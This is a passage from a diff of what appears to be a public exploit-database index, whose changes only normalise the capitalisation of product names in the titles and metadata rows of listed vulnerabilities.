Kamir",php,webapps,0 -23688,platforms/php/webapps/23688.txt,"VBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 +23688,platforms/php/webapps/23688.txt,"vBulletin 1.0/1.1/2.0.x/2.2.x - Cross-Site Scripting",2004-02-12,"Jamie Fisher",php,webapps,0 23689,platforms/windows/dos/23689.c,"Crob FTP Server 3.5.2 - Remote Denial of Service",2004-02-12,gsicht,windows,dos,0 23690,platforms/linux/dos/23690.txt,"XFree86 4.x - CopyISOLatin1Lowered Font_Name Buffer Overflow",2004-02-12,"Greg MacManus",linux,dos,0 23632,platforms/windows/remote/23632.txt,"Crob FTP Server 3.5.1 - Remote Information Disclosure",2004-02-02,"Zero X",windows,remote,0 @@ -20864,8 +20864,8 @@ id,file,description,date,author,platform,type,port 23648,platforms/windows/dos/23648.pl,"Web Crossing Web Server 4.0/5.0 Component - Remote Denial of Service",2004-02-04,"Peter Winter-Smith",windows,dos,0 23649,platforms/windows/remote/23649.rb,"Microsoft SQL Server - Database Link Crawling Command Execution",2012-12-25,Metasploit,windows,remote,0 23650,platforms/windows/remote/23650.rb,"IBM Lotus Notes Client URL Handler - Command Injection",2012-12-25,Metasploit,windows,remote,0 -23651,platforms/php/remote/23651.rb,"WordPress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 -23652,platforms/php/remote/23652.rb,"WordPress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23651,platforms/php/remote/23651.rb,"Wordpress WP-Property Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 +23652,platforms/php/remote/23652.rb,"Wordpress Asset-Manager Plugin - PHP File Upload",2012-12-25,Metasploit,php,remote,0 23653,platforms/php/webapps/23653.txt,"Crossday Discuz! 2.0/3.0 - Cross-Site Scripting",2004-02-05,"Cheng Peng Su",php,webapps,0 23654,platforms/windows/dos/23654.txt,"XLight FTP Server 1.x - Long Directory Request Remote Denial of Service",2004-02-05,intuit,windows,dos,0 23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0 @@ -21025,8 +21025,8 @@ id,file,description,date,author,platform,type,port 23819,platforms/php/webapps/23819.txt,"Phorum 3.x - login.php HTTP_REFERER Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23820,platforms/php/webapps/23820.txt,"Phorum 3.x - profile.php target Parameter Cross-Site Scripting",2004-03-15,JeiAr,php,webapps,0 23821,platforms/php/webapps/23821.php,"PHPBB 1.x/2.0.x - Search.php Search_Results Parameter SQL Injection",2004-01-04,pokleyzz,php,webapps,0 -23822,platforms/php/webapps/23822.txt,"VBulletin 3.0 - ForumDisplay.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 -23823,platforms/php/webapps/23823.txt,"VBulletin 3.0 - ShowThread.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 +23822,platforms/php/webapps/23822.txt,"vBulletin 3.0 - ForumDisplay.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 +23823,platforms/php/webapps/23823.txt,"vBulletin 3.0 - ShowThread.php Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23824,platforms/php/webapps/23824.txt,"Mambo Open Source 4.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23825,platforms/php/webapps/23825.txt,"Mambo Open Source 4.5 - 'index.php' mos_change_template Parameter Cross-Site Scripting",2004-03-16,JeiAr,php,webapps,0 23828,platforms/php/webapps/23828.txt,"e107 1.0.1 - Cross-Site Request Forgery Resulting in Arbitrary Javascript Execution",2013-01-02,"Joshua Reynolds",php,webapps,0 @@ -21056,7 +21056,7 @@ id,file,description,date,author,platform,type,port 23853,platforms/asp/webapps/23853.txt,"Expinion.net Member Management System 2.1 - error.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23854,platforms/asp/webapps/23854.txt,"Expinion.net Member Management System 2.1 - register.asp err Parameter Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0 -23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 +23856,platforms/php/remote/23856.rb,"Wordpress Plugin Advanced Custom Fields - Remote File Inclusion",2013-01-03,Metasploit,php,remote,0 23857,platforms/asp/webapps/23857.txt,"Expinion.net News Manager Lite 2.5 - comment_add.asp Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23858,platforms/asp/webapps/23858.txt,"Expinion.net News Manager Lite 2.5 - search.asp Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 23859,platforms/asp/webapps/23859.txt,"Expinion.net News Manager Lite 2.5 - category_news_headline.asp Cross-Site Scripting",2004-03-20,"Manuel Lopez",asp,webapps,0 @@ -21065,7 +21065,7 @@ id,file,description,date,author,platform,type,port 23862,platforms/asp/webapps/23862.txt,"Expinion.net News Manager Lite 2.5 - news_sort.asp filter Parameter SQL Injection",2004-03-20,"Manuel Lopez",asp,webapps,0 23863,platforms/asp/webapps/23863.txt,"Expinion.net News Manager Lite 2.5 - NEWS_LOGIN Cookie ADMIN Parameter Manipulation Admin Authentication Bypass",2004-03-20,"Manuel Lopez",asp,webapps,0 23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0 -23865,platforms/php/webapps/23865.txt,"VBulletin 2.x - Private.php Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 +23865,platforms/php/webapps/23865.txt,"vBulletin 2.x - Private.php Cross-Site Scripting",2004-03-22,JeiAr,php,webapps,0 23866,platforms/php/webapps/23866.txt,"phpBB 1.x/2.0.x - Multiple Input Validation Vulnerabilities",2004-03-22,JeiAr,php,webapps,0 23867,platforms/php/webapps/23867.txt,"Invision Power Services Invision Gallery 1.0.1 - Multiple SQL Injections",2004-03-23,JeiAr,php,webapps,0 23868,platforms/php/webapps/23868.txt,"Invision Power Top Site List 1.0/1.1 - Comments function id Parameter SQL Injection",2004-03-22,JeiAr,php,webapps,0 @@ -21165,7 +21165,7 @@ id,file,description,date,author,platform,type,port 23966,platforms/php/webapps/23966.txt,"TikiWiki Project 1.8 - tiki-browse_categories.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 23967,platforms/php/webapps/23967.txt,"E Sms Script - Multiple SQL Injections",2013-01-08,"cr4wl3r ",php,webapps,0 23968,platforms/asp/webapps/23968.txt,"Advantech WebAccess HMI/SCADA Software - Persistence Cross-Site Scripting",2013-01-08,"SecPod Research",asp,webapps,0 -23970,platforms/php/webapps/23970.rb,"WordPress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,Metasploit,php,webapps,0 +23970,platforms/php/webapps/23970.rb,"Wordpress Plugin Google Document Embedder - Arbitrary File Disclosure",2013-01-08,Metasploit,php,webapps,0 23971,platforms/php/webapps/23971.txt,"TikiWiki Project 1.8 - tiki-index.php comments_offset & offset Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23972,platforms/php/webapps/23972.txt,"TikiWiki Project 1.8 - tiki-user_tasks.php offset & sort_mode Parameter SQL Injections",2004-04-12,JeiAr,php,webapps,0 23973,platforms/php/webapps/23973.txt,"TikiWiki Project 1.8 - tiki-directory_search.php sort_mode Parameter SQL Injection",2004-04-12,JeiAr,php,webapps,0 @@ -21188,7 +21188,7 @@ id,file,description,date,author,platform,type,port 23998,platforms/php/webapps/23998.txt,"PHP-Nuke 6.x/7.x - Multiple SQL Injections",2004-04-13,waraxe,php,webapps,0 23999,platforms/linux/dos/23999.txt,"Neon WebDAV Client Library 0.2x - Format String Vulnerabilities",2004-04-14,"Thomas Wana",linux,dos,0 24000,platforms/windows/dos/24000.pl,"Qualcomm Eudora 6.0.3 - MIME Message Nesting Denial of Service",2004-04-14,"Paul Szabo",windows,dos,0 -23993,platforms/php/webapps/23993.txt,"Websitebaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 +23993,platforms/php/webapps/23993.txt,"WebsiteBaker Addon Concert Calendar 2.1.4 - Multiple Vulnerabilities",2013-01-09,"Stefan Schurtz",php,webapps,0 23994,platforms/php/webapps/23994.txt,"Free Blog 1.0 - Multiple Vulnerabilities",2013-01-09,"cr4wl3r ",php,webapps,0 23995,platforms/hardware/webapps/23995.txt,"Watson Management Console 4.11.2.G - Directory Traversal",2013-01-09,"Dhruv Shah",hardware,webapps,0 23996,platforms/windows/local/23996.py,"Inmatrix Ltd. Zoom Player 8.5 - (.jpeg) Exploit",2013-01-09,"Debasish Mandal",windows,local,0 @@ -21231,7 +21231,7 @@ id,file,description,date,author,platform,type,port 24036,platforms/php/webapps/24036.txt,"phProfession 2.5 - modules.php jcode Parameter Cross-Site Scripting",2004-04-23,"Janek Vind",php,webapps,0 24037,platforms/php/webapps/24037.txt,"PostNuke Phoenix 0.726 - openwindow.php hlpfile Parameter Cross-Site Scripting",2004-04-21,"Janek Vind",php,webapps,0 24038,platforms/linux/remote/24038.txt,"Xine 0.9.x and Xine-Lib 1 - Multiple Remote File Overwrite Vulnerabilities",2004-04-22,anonymous,linux,remote,0 -24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 +24039,platforms/asp/webapps/24039.txt,"NewsTraXor Website Management Script 2.9 Beta - Database Disclosure",2004-04-22,CyberTal0n,asp,webapps,0 24040,platforms/multiple/remote/24040.txt,"PISG 0.54 - IRC Nick HTML Injection",2004-04-22,shr3kst3r,multiple,remote,0 24041,platforms/multiple/remote/24041.c,"Epic Games Unreal Tournament Engine 3 - UMOD Manifest.INI Arbitrary File Overwrite",2004-04-22,"Luigi Auriemma",multiple,remote,0 24042,platforms/windows/dos/24042.txt,"Yahoo! Messenger 5.6 - YInsthelper.dll Multiple Buffer Overflow Vulnerabilities",2004-04-23,"Rafel Ivgi The-Insider",windows,dos,0 @@ -21239,7 +21239,7 @@ id,file,description,date,author,platform,type,port 24044,platforms/php/webapps/24044.txt,"phpLiteAdmin 1.9.3 - Remote PHP Code Injection",2013-01-11,L@usch,php,webapps,0 24045,platforms/java/remote/24045.rb,"Java Applet JMX - Remote Code Execution (1)",2013-01-11,Metasploit,java,remote,0 24049,platforms/asp/webapps/24049.txt,"PW New Media Network Modular Site Management System 0.2.1 - Ver.asp Information Disclosure",2004-04-23,CyberTalon,asp,webapps,0 -24050,platforms/php/webapps/24050.txt,"Advanced Guestbook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 +24050,platforms/php/webapps/24050.txt,"Advanced GuestBook 2.2 - Password Parameter SQL Injection",2004-04-23,JQ,php,webapps,0 24051,platforms/windows/dos/24051.txt,"Microsoft Windows XP/2000/NT 4 - Shell Long Share Name Buffer Overrun",2004-04-25,"Rodrigo Gutierrez",windows,dos,0 24052,platforms/php/webapps/24052.txt,"OpenBB 1.0.x - member.php redirect Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 24053,platforms/php/webapps/24053.txt,"OpenBB 1.0.x - myhome.php to Parameter Cross-Site Scripting",2004-04-26,JeiAr,php,webapps,0 @@ -21308,10 +21308,10 @@ id,file,description,date,author,platform,type,port 24118,platforms/windows/remote/24118.txt,"Microsoft Outlook Express 6.0 - URI Obfuscation",2004-05-13,http-equiv,windows,remote,0 24119,platforms/windows/dos/24119.txt,"Microsoft Internet Explorer 5.0.1 - http-equiv Meta Tag Denial of Service",2004-05-14,"Mike Mauler",windows,dos,0 24120,platforms/linux/remote/24120.c,"LHA 1.x - Multiple extract_one Buffer Overflow Vulnerabilities",2004-05-19,"Lukasz Wojtow",linux,remote,0 -24121,platforms/osx/remote/24121.txt,"Apple Mac OS X 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 +24121,platforms/osx/remote/24121.txt,"Apple Mac OSX 10.3.x - Help Protocol Remote Code Execution",2004-05-17,"Troels Bay",osx,remote,0 24122,platforms/cgi/webapps/24122.txt,"TurboTrafficTrader C 1.0 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2004-05-17,"Kaloyan Olegov Georgiev",cgi,webapps,0 24123,platforms/linux/local/24123.sh,"WGet 1.x - Insecure File Creation Race Condition",2004-05-17,"Hugo Vazquez",linux,local,0 -24124,platforms/php/webapps/24124.txt,"VBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 +24124,platforms/php/webapps/24124.txt,"vBulletin 1.0/2.x/3.0 - 'index.php' User Interface Spoofing",2004-05-17,p0rk,php,webapps,0 24125,platforms/windows/remote/24125.txt,"Microsoft Windows XP - Self-Executing Folder",2004-05-17,"Roozbeh Afrasiabi",windows,remote,0 24126,platforms/php/webapps/24126.txt,"osCommerce 2.x - File Manager Directory Traversal",2004-05-17,Rene,php,webapps,0 24127,platforms/php/webapps/24127.txt,"PHP-Nuke 6.x/7.x - Modpath Parameter Potential File Include",2004-05-17,waraxe,php,webapps,0 @@ -21349,9 +21349,9 @@ id,file,description,date,author,platform,type,port 24158,platforms/jsp/webapps/24158.txt,"Oracle Application Framework - Diagnostic Mode Bypass",2013-01-16,"Trustwave's SpiderLabs",jsp,webapps,0 24159,platforms/linux/remote/24159.rb,"Nagios3 - history.cgi Host Command Execution",2013-01-16,Metasploit,linux,remote,0 24160,platforms/linux/remote/24160.txt,"SquirrelMail 1.x - Email Header HTML Injection",2004-05-31,"Roman Medina",linux,remote,0 -24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 -24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 -24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 +24161,platforms/windows/remote/24161.txt,"Sambar Server 6.1 Beta 2 - show.asp show Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 +24162,platforms/windows/remote/24162.txt,"Sambar Server 6.1 Beta 2 - showperf.asp title Parameter Cross-Site Scripting",2004-06-01,"Oliver Karow",windows,remote,0 +24163,platforms/windows/remote/24163.txt,"Sambar Server 6.1 Beta 2 - showini.asp Arbitrary File Access",2004-06-01,"Oliver Karow",windows,remote,0 24164,platforms/cgi/webapps/24164.txt,"Rit Research Labs TinyWeb 1.9.2 - Unauthorized Script Disclosure",2004-06-01,"Ziv Kamir",cgi,webapps,0 24165,platforms/linux/remote/24165.pl,"Firebird 1.0 - Remote Pre-Authentication Database Name Buffer Overrun",2004-06-01,wsxz,linux,remote,0 24166,platforms/php/webapps/24166.txt,"PHP-Nuke 5.x/6.x/7.x - Direct Script Access Security Bypass",2004-06-01,Squid,php,webapps,0 @@ -21392,7 +21392,7 @@ id,file,description,date,author,platform,type,port 24205,platforms/linux/remote/24205.txt,"Novell NCP - Pre-Authenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0 24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0 24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0 -24207,platforms/windows/local/24207.c,"NVidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 +24207,platforms/windows/local/24207.c,"Nvidia Display Driver Service (Nsvr) - Exploit",2013-01-18,"Jon Bailey",windows,local,0 24208,platforms/windows/dos/24208.c,"FreeIPS 1.0 Protected Service - Denial of Service",2004-06-14,shawnwebb@softhome.net,windows,dos,0 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service",2004-06-14,"Tan Chew Keong",windows,dos,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow",2003-03-10,watercloud,hp-ux,local,0 @@ -21414,11 +21414,11 @@ id,file,description,date,author,platform,type,port 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+ / DI-624 / DI-704 - DHCP Log HTML Injection",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component - Arbitrary File Upload",2013-01-19,"Red Dragon_al",php,webapps,0 -24229,platforms/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps,0 +24229,platforms/php/webapps/24229.txt,"Wordpress Plugin Ripe HD FLV Player - SQL Injection",2013-01-19,Zikou-16,php,webapps,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service",2004-06-23,"Marceta Milos",freebsd,dos,0 -24234,platforms/php/webapps/24234.html,"VBulletin 3.0.1 - newreply.php WYSIWYG_HTML Parameter Cross-Site Scripting",2004-06-24,"Cheng Peng Su",php,webapps,0 +24234,platforms/php/webapps/24234.html,"vBulletin 3.0.1 - newreply.php WYSIWYG_HTML Parameter Cross-Site Scripting",2004-06-24,"Cheng Peng Su",php,webapps,0 24235,platforms/php/webapps/24235.txt,"ZaireWeb Solutions Newsletter ZWS - Administrative Interface Authentication Bypass",2004-06-24,GaMeS,php,webapps,0 24236,platforms/cgi/webapps/24236.txt,"McMurtrey/Whitaker & Associates Cart32 2-5 GetLatestBuilds Script - Cross-Site Scripting",2004-06-28,"Dr.Ponidi Haryanto",cgi,webapps,0 24237,platforms/cgi/webapps/24237.txt,"CGIScript.net CSFAQ 1.0 Script - Full Path Disclosure",2004-06-28,DarkBicho,cgi,webapps,0 @@ -21478,7 +21478,7 @@ id,file,description,date,author,platform,type,port 24291,platforms/php/webapps/24291.txt,"Outblaze Webmail - HTML Injection",2004-07-19,DarkBicho,php,webapps,0 24292,platforms/php/webapps/24292.txt,"Adam Ismay Print Topic Mod 1.0 - SQL Injection",2004-07-19,"Bartek Nowotarski",php,webapps,0 24293,platforms/sco/local/24293.c,"SCO Multi-channel Memorandum Distribution Facility - Multiple Vulnerabilities",2004-07-20,"Ramon Valle",sco,local,0 -24294,platforms/php/webapps/24294.txt,"WordPress Developer Formatter Plugin - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps,0 +24294,platforms/php/webapps/24294.txt,"Wordpress Developer Formatter Plugin - Cross-Site Request Forgery",2013-01-22,"Junaid Hussain",php,webapps,0 24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script - Password Disclosure",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting",2004-08-16,"Javier Ubilla",php,webapps,0 24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x - Common.php Remote File Inclusion",2004-07-20,"Radek Hulan",php,webapps,0 @@ -21547,7 +21547,7 @@ id,file,description,date,author,platform,type,port 24361,platforms/linux/remote/24361.c,"GNU CFEngine 2.0.x/2.1 - AuthenticationDialogue Remote Heap Based Buffer Overrun (2)",2004-08-09,jsk,linux,remote,0 24362,platforms/windows/dos/24362.txt,"Internet Security Systems BlackICE PC Protection 3.6 - Firewall.INI Local Buffer Overrun",2004-08-11,"Paul Craig",windows,dos,0 24363,platforms/windows/remote/24363.txt,"clearswift mimesweeper for Web 4.0/5.0 - Directory Traversal",2004-07-11,"Kroma Pierre",windows,remote,0 -24364,platforms/php/webapps/24364.txt,"WordPress SolveMedia 1.1.0 Plugin - Cross-Site Request Forgery",2013-01-25,"Junaid Hussain",php,webapps,0 +24364,platforms/php/webapps/24364.txt,"Wordpress SolveMedia 1.1.0 Plugin - Cross-Site Request Forgery",2013-01-25,"Junaid Hussain",php,webapps,0 24365,platforms/php/webapps/24365.txt,"ImageCMS 4.0.0b - Multiple Vulnerabilities",2013-01-25,"High-Tech Bridge SA",php,webapps,0 24366,platforms/windows/local/24366.rb,"Windows - Manage Memory Payload Injection",2013-01-25,Metasploit,windows,local,0 24367,platforms/php/webapps/24367.txt,"IceWarp Web Mail 3.3.2/5.2.7 - Multiple Remote Input Validation Vulnerabilities",2004-08-11,ShineShadow,php,webapps,0 @@ -21584,7 +21584,7 @@ id,file,description,date,author,platform,type,port 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 - Predictable Temporary File Creation",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay - Pad_selected Parameter Cross-Site Scripting",2004-08-23,"King Of Love",php,webapps,0 24400,platforms/cgi/webapps/24400.txt,"Axis Network Camera 2.x And Video Server 1-3 - virtualinput.cgi Arbitrary Command Execution",2004-08-23,bashis,cgi,webapps,0 -24403,platforms/php/webapps/24403.txt,"EGroupWare 1.0 Calendar Module - date Parameter Cross-Site Scripting",2004-08-23,"Joxean Koret",php,webapps,0 +24403,platforms/php/webapps/24403.txt,"eGroupWare 1.0 Calendar Module - date Parameter Cross-Site Scripting",2004-08-23,"Joxean Koret",php,webapps,0 24401,platforms/cgi/webapps/24401.txt,"Axis Network Camera 2.x And Video Server 1-3 - Directory Traversal",2004-08-23,bashis,cgi,webapps,0 24402,platforms/cgi/webapps/24402.php,"Axis Network Camera 2.x And Video Server 1-3 - HTTP Authentication Bypass",2004-08-23,bashis,cgi,webapps,0 24404,platforms/windows/remote/24404.txt,"Gadu-Gadu 6.0 - File Download Filename Obfuscation",2004-08-23,"Bartosz Kwitkowski",windows,remote,0 @@ -21657,7 +21657,7 @@ id,file,description,date,author,platform,type,port 24479,platforms/windows/remote/24479.py,"FreeFloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Post-Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0 24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0 -24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 +24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 24486,platforms/multiple/dos/24486.txt,"Google Chrome - Silent HTTP Authentication",2013-02-11,T355,multiple,dos,0 @@ -21668,17 +21668,17 @@ id,file,description,date,author,platform,type,port 24494,platforms/hardware/remote/24494.rb,"Polycom HDX - Telnet Authorization Bypass (Metasploit)",2013-02-14,"Paul Haas",hardware,remote,23 24492,platforms/php/webapps/24492.php,"OpenEMR 4.1.1 - (ofc_upload_image.php) Arbitrary File Upload",2013-02-13,LiquidWorm,php,webapps,0 24495,platforms/windows/remote/24495.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit)",2013-02-14,"Scott Bell",windows,remote,0 -24496,platforms/windows/webapps/24496.txt,"Sonicwall Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 +24496,platforms/windows/webapps/24496.txt,"SonicWALL Scrutinizer 9.5.2 - SQL Injection",2013-02-14,Vulnerability-Lab,windows,webapps,0 24497,platforms/hardware/webapps/24497.txt,"Transferable Remote 1.1 iPad iPhone - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,hardware,webapps,0 -24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 +24498,platforms/hardware/webapps/24498.txt,"OpenPLI 3.0 Beta (OpenPLi-beta-dm7000-20130127-272) - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 24499,platforms/hardware/webapps/24499.txt,"Raidsonic IB-NAS5220 and IB-NAS4220-B - Multiple Vulnerabilities",2013-02-14,m-1-k-3,hardware,webapps,0 -24500,platforms/windows/webapps/24500.txt,"Sonicwall OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 +24500,platforms/windows/webapps/24500.txt,"SonicWALL OEM Scrutinizer 9.5.2 - Multiple Vulnerabilities",2013-02-14,Vulnerability-Lab,windows,webapps,0 24501,platforms/php/webapps/24501.txt,"Ultra Light Forum - Persistant Cross-Site Scripting",2013-02-14,"cr4wl3r ",php,webapps,0 24502,platforms/windows/remote/24502.rb,"Foxit Reader Plugin - URL Processing Buffer Overflow",2013-02-14,Metasploit,windows,remote,0 24504,platforms/hardware/webapps/24504.txt,"TP-Link TL-WA701N / TL-WA701ND - Multiple Vulnerabilities",2013-02-15,m-1-k-3,hardware,webapps,0 24505,platforms/windows/local/24505.py,"Photodex ProShow Producer 5.0.3297 - (.pxs) Memory Corruption Exploit",2013-02-15,"Julien Ahrens",windows,local,0 24506,platforms/php/webapps/24506.txt,"Cometchat - Multiple Vulnerabilities",2013-02-15,B127Y,php,webapps,0 -24507,platforms/php/webapps/24507.txt,"chillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 +24507,platforms/php/webapps/24507.txt,"ChillyCMS 1.3.0 - Multiple Vulnerabilities",2013-02-15,"Abhi M Balakrishnan",php,webapps,0 24512,platforms/php/webapps/24512.txt,"Scripts Genie Top Sites - (out.php id parameter) SQL Injection",2013-02-17,3spi0n,php,webapps,0 24513,platforms/hardware/webapps/24513.txt,"Netgear DGN2200B - Multiple Vulnerabilities",2013-02-18,m-1-k-3,hardware,webapps,0 24514,platforms/php/webapps/24514.txt,"Scripts Genie Pet Rate Pro - Multiple Vulnerabilities",2013-02-18,TheMirkin,php,webapps,0 @@ -21703,14 +21703,14 @@ id,file,description,date,author,platform,type,port 24542,platforms/php/webapps/24542.txt,"Rix4Web Portal - Blind SQL Injection",2013-02-26,L0n3ly-H34rT,php,webapps,0 24543,platforms/ios/webapps/24543.txt,"iOS IPMap 2.5 - Arbitrary File Upload",2013-02-26,Vulnerability-Lab,ios,webapps,0 24544,platforms/php/webapps/24544.txt,"MTP Image Gallery 1.0 - (edit_photos.php title parameter) Cross-Site Scripting",2013-02-26,LiquidWorm,php,webapps,0 -24545,platforms/php/webapps/24545.txt,"MTP Guestbook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 +24545,platforms/php/webapps/24545.txt,"MTP GuestBook 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24546,platforms/php/webapps/24546.txt,"MTP Poll 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,LiquidWorm,php,webapps,0 24547,platforms/php/remote/24547.rb,"Kordil EDms 2.2.60rc3 - Unauthenticated Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 24548,platforms/php/remote/24548.rb,"Glossword 1.8.8 & 1.8.12 - Arbitrary File Upload",2013-02-26,Metasploit,php,remote,0 24549,platforms/php/remote/24549.rb,"PolarPearCMS - PHP File Upload",2013-02-26,Metasploit,php,remote,0 24550,platforms/hardware/webapps/24550.txt,"WiFilet 1.2 iPad iPhone - Multiple Vulnerabilities",2013-02-26,Vulnerability-Lab,hardware,webapps,0 24551,platforms/php/webapps/24551.txt,"Joomla! 3.0.2 - (highlight.php) PHP Object Injection",2013-02-27,EgiX,php,webapps,0 -24552,platforms/php/webapps/24552.txt,"WordPress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 +24552,platforms/php/webapps/24552.txt,"Wordpress Comment Rating Plugin 2.9.32 - Multiple Vulnerabilities",2013-02-27,ebanyu,php,webapps,0 24555,platforms/linux/local/24555.c,"Linux Kernel < 3.3.x < 3.7.x (Arch Linux x86_64) - 'sock_diag_handlers[]' Privilege Escalation (1)",2013-02-27,sd,linux,local,0 24556,platforms/windows/dos/24556.py,"Hanso Player 2.1.0 - '.m3u' Buffer Overflow",2013-03-01,metacom,windows,dos,0 24557,platforms/windows/remote/24557.py,"Sami FTP Server 2.0.1 - LIST Command Buffer Overflow",2013-03-01,superkojiman,windows,remote,0 @@ -21791,15 +21791,15 @@ id,file,description,date,author,platform,type,port 24635,platforms/windows/dos/24635.c,"Microsoft Windows XP - TCP Packet Fragmentation 